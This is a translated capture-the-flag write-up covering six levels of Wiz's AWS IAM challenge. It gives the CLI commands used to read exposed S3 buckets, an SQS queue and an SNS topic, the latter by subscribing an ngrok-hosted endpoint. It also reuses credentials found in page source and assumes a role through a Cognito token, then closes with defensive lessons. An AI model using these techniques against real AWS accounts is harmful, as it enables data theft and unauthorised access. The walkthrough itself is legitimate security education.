About author:Xiao Wendi, head of OWASP China Guangdong Branch, a distinguished expert of the Cybersecurity Plus community, is currently a security architect of a foreign company, responsible for application security design, management and review.Recently, a foreign colleague recommended to me a CTF called Big IAM Challenge, which was initiated by WIZ, through which I can get a peek at the leopard and deeply understand the IAM security of AWS.
AWS IAM (Identity and Access Management) is an identity and access management service in Amazon Web Services that is used to manage access and security to AWS resources. IAM allows users to interact with AWS, and each user is given a unique credential (Access Key ID and Secret Access Key) in order to interact with AWS services using API or SDK calls.
IAM includes concepts such as IAM users, groups, and roles that can be used to fine-grained control of access to AWS services and resources. By using IAM, access to AWS resources can be better managed and restricted, and permission separation and security best practices can be implemented.
It is important to note that when using IAM, you need to follow best practices, such as separating permissions, creating complex password policies, and changing API keys regularly, to ensure the security of AWS resources. But are these practices sufficient?What are the specific vulnerabilities of IAM security, we can look at the IAM CTF and experience it for ourselves.
AWS IAM CTF, like other CTFs, is to find the hidden flag through the description of the title, which is the so-called capture the flag competition. If you are interested in AWS IAM CTF, you can visit the address:
This CTF has a total of 6 levels, which is 6 IAM security issues.
The first level
This level is relatively simple, the policy of IAM, as shown in the following figure:
It is easy to find that the policy allows anonymous access to the directory of the s3 bucket "thebigiamchallenge-storage-9979f4b" and the files in **, it is very obvious that the flag file is in the files file of the s3 bucket. The order here is as follows:
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -Especially the third command, if you don't have permission to create a file or **file to a local computer, you can use this command to view the contents of the file directly.
The second level
This issue is about SQS, and IAM Policy does not restrict the permissions of SQS. The IAM policy is as follows:
Since there is no limit, we can subscribe to this sqs by ourselves, and then read the content inside, and the flag is in it. The command lines used here are:
aws sqs receive-message --queue-url --attribute-names all --message-attribute-names allThe URL of the SQS can be assembled according to the content of the IAM Policy in the following format:
https://sqs..amazonaws.com, based on the above results it is easy to get the URL of the sqs is.
Get a URL from the body of the return value, and open it to get the flag.
The third level
This level is about SNS, see IAM policy, and the endpoint is restricted. The IAM policy is shown in the following figure:
The restriction here is that the sns:endpoint must contain @tbicwiz.io。At first glance, it looks like an email address, but if it's an email address, there's no way we can get a tbicwiz.io. If you look closely at the description of the endpoint of sns, you will find that there are multiple endpoint types, and all endpoints are defined using sns:endpoint, which makes it convenient for us to bypass this limitation.
Through simple analysis, it is easy to know that when the endpoint is http s, the address of the endpoint is the url, and we can include @tbic in the urlwiz.IO, such as https: can satisfy the requirements to get the content of the SNS.
We simply use Python's Flask to construct a web service, which accepts HTTP requests and prints out HTTP requests or Repspose, or captures incoming and outgoing HTTP requests through tools such as BurpSuite.
Next, use ngrok to map local services to the Internet, such as "ngrok http localhost:8080".
Then use the following url:https: to subscribe to SNS, and the command is as follows:
aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:tbicwizpushnotifications --protocol https --notification-endpoint https:/At this time, observing the web service, the first thing you will receive is a request with a URL in it, click on this URL to confirm the subscription. Then I get a request with a flag in the return value.
Level 4
This is still about S3, please see iam policy:
As you can see from the IAM policy, you don't need any permissions to read S3 objects, but you need a specific user user admin to get the object list of the S3 bucket, so the key to this level is how to bypass the restrictions of a specific user to get the object list of the S3 bucket.
The answer is frighteningly simple, just add a special argument "-no-sign-request" to bypass this limitation, and the command line is as follows:
aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-requestThen you can use the normal command to get the content of the file, specifically refer to the content of the first level, so as to get the flag.
Level 5
This level looks like it's about Cognito, and the IAM policy is as follows:
However, from the IAM policy, we can only know that we want to obtain the Cognito certificate, and then use this Cognito certificate to obtain the content in the S3 bucket, and the flag should be in the S3.
If we can't see anything, we consider looking at the source of the page**, and there is a surprise discovery at this time.
It can be seen from the source ** that the AWS certification information is actually written on the page, and at this time, using the chrome console, it is easy to obtain this information, and reuse this information to obtain the content in the S3 bucket.
Here you will run into a new problem with the CORS error, and the error message is:
At this time, change your thinking, instead of directly obtaining the data, you will get the signed URL of S3, and there will be no error at this time.
At this time, you can see the name of the flag file by accessing the signed URL. Then, using the same idea as above, you can get the signed URL corresponding to the file.
Open this signed URL to get the corresponding flag.
Level 6
This level is still about Cognito, and its IAM policy is:
There is no problem with the content, and the value of the cognito identity is strictly limited. The title also gives the name of an iam role, arn:aws:iam::092297851374:role cognito s3accessauth role, and let's try to use this iam role for access.
The above information is to make a connection from Cognito to IAM Role, can this be done?Display is achievable.
First of all, you can get the id::of cognito-identity by command
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3bThen, based on this ID, you can get the open ID token of cognito-identity
aws cognito-identity get-open-id-token --identity-idFinally, the obtained Open ID token is used to establish a connection with the IAM role.
aws sts assume-role-with-web-identity \ duration-seconds 3600 \ role-session-name ctf2 \ role-arn arn:aws:iam::092297851374:role/cognito_s3accessauth_role \ web-identity-token "jwt token"This creates a ctf2 role-session, and then uses this role-session to get the list of s3 buckets and read the contents. This can be done using the python boto3 library.
Through this S3 client object, you can get the list of S3 buckets and read the contents by generating a signed URL to get a flag.
Through the summary of the above 6 levels, you will find that there are loopholes in the inadvertent places.
For example, in Level 1, there are many cases where the S3 bucket is exposed to the public on the Internet due to no permission restrictions, resulting in sensitive data leakage.
For example, in Level 2, since there is no restriction on SQS, SQS can be accessed anywhere. As a SaaS service, SQS can be accessed directly over the Internet, even if you create your own VPC, which is very important to note. I can't help but think of services such as Elasticsearch and Kafka, which are often exposed on the Internet, and exposed resources can also be easily obtained through scanning, resulting in sensitive data leakage.
For example, in Level 3, SNS seems to have permission restrictions, but for convenience, the wildcard character * is used, which is intended to restrict access to the company's own mailbox, but the endpoint design of SNS does not consider a point, and all endpoints share a parameter for control. At this time, it is easy to be bypassed, resulting in sensitive data leakage. Sometimes convenience is the enemy of security, and convenience is also convenience for malicious attackers, so be cautious.
For example, in Level 4, I am not familiar with the API commands of S3, and I don't know why AWS sets up this API interface, so I can get the list in the S3 bucket without permission. I think the most serious thing is that the s3 bucket is set to everyone can get files, which is the most deadly. Through the current practice, we have found that everyone has not realized that their content has been put on the public network, and if you do not do a good job of permission control, everyone can obtain your information. You can go back and see if you will find any surprises in your S3 bucket.
For example, level 5, this is a design flaw, I really didn't expect to put the information of the AWS access key on the front-end, don't you know that the front-end** can be seen and operated by everyone?And the variables of the front-end ** can also be manipulated. This is not limited to CTF games, you can check if there is a similar situation.
For example, in Level 6, the Cognito service can be associated with the IAM role, which is terrible. Based on the above experience, if I can obtain the open ID token of Cognito, and then know the ARN of the IAM Role, I can generate an IAM Role session, which contains the AWS Access ID, AWS Secret Key, and sensitive information of the AWS Session, and then use this information to fake the use of this IAM Role to operate. It looks a little scary, do you feel this way?
Based on the above analysis, IAM security may not really look that secure, so you should check the security best practices according to the official AWS documentation, or use tools such as KICS to scan Terraform, CloudFormation, etc., to ensure that our IAM is in line with the best security practices at the beginning.
IAM security is easier said than done, and we need to be cautious.